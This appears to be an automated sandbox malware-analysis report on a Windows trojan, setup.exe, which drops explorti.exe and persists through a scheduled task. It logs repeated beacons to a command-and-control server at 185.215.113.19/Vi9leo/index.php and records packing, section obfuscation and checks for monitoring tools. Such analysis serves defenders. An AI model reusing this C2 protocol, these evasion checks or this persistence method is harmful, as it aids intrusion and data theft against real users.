Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.19 185.215.113.19
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F5BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 6_2_00F5BD60
Source: unknown HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/
Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/=
Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000006.00000002.2883573047.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php&
Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php(
Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php1
Source: explorti.exe, 00000006.00000002.2883573047.0000000000740000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php54
Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php6
Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpC:
Source: explorti.exe, 00000006.00000002.2883573047.0000000000740000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpL3
Source: explorti.exe, 00000006.00000002.2883573047.0000000000740000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpQ
Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpV
Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpWindows
Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpeb8a7
Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpm32
Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpoft
Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpon
Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpppData
Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phprosoft

System Summary
barindex
PE file contains section with special chars
Source: setup.exe Static PE information: section name:
Source: setup.exe Static PE information: section name: .idata
Source: setup.exe Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: .idata
Source: explorti.exe.0.dr Static PE information: section name:
Creates files inside the system directory
Source: C:\Users\user\Desktop\setup.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F54CF0 6_2_00F54CF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F93068 6_2_00F93068
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F5E440 6_2_00F5E440
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F87D83 6_2_00F87D83
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F54AF0 6_2_00F54AF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F9765B 6_2_00F9765B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F92BD0 6_2_00F92BD0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F9777B 6_2_00F9777B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F98720 6_2_00F98720
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F96F09 6_2_00F96F09
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe 589EB31A43D44FE275C70BFC3F592965B9236B59645A7ED633BBEC66526D64AB
Uses 32bit PE files
Source: setup.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: setup.exe Static PE information: Section: ZLIB complexity 0.9998612534153005
Source: setup.exe Static PE information: Section: usoriijt ZLIB complexity 0.9945536283368326
Source: explorti.exe.0.dr Static PE information: Section: ZLIB complexity 0.9998612534153005
Source: explorti.exe.0.dr Static PE information: Section: usoriijt ZLIB complexity 0.9945536283368326
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\setup.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7 Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: setup.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\setup.exe File read: C:\Users\user\Desktop\setup.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
Source: C:\Users\user\Desktop\setup.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\setup.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: acgenral.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: setup.exe Static file information: File size 1909760 > 1048576
Source: setup.exe Static PE information: Raw size of usoriijt is bigger than: 0x100000 < 0x1a0c00

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\setup.exe Unpacked PE file: 0.2.setup.exe.3c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 1.2.explorti.exe.f50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 2.2.explorti.exe.f50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 6.2.explorti.exe.f50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: explorti.exe.0.dr Static PE information: real checksum: 0x1d3ae7 should be: 0x1d959a
Source: setup.exe Static PE information: real checksum: 0x1d3ae7 should be: 0x1d959a
PE file contains sections with non-standard names
Source: setup.exe Static PE information: section name:
Source: setup.exe Static PE information: section name: .idata
Source: setup.exe Static PE information: section name:
Source: setup.exe Static PE information: section name: usoriijt
Source: setup.exe Static PE information: section name: ymfuwjgb
Source: setup.exe Static PE information: section name: .taggant
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: .idata
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: usoriijt
Source: explorti.exe.0.dr Static PE information: section name: ymfuwjgb
Source: explorti.exe.0.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F6D84C push ecx; ret 6_2_00F6D85F
Source: setup.exe Static PE information: section name: entropy: 7.983026486073879
Source: setup.exe Static PE information: section name: usoriijt entropy: 7.952894618410208
Source: explorti.exe.0.dr Static PE information: section name: entropy: 7.983026486073879
Source: explorti.exe.0.dr Static PE information: section name: usoriijt entropy: 7.952894618410208
Drops PE files
Source: C:\Users\user\Desktop\setup.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
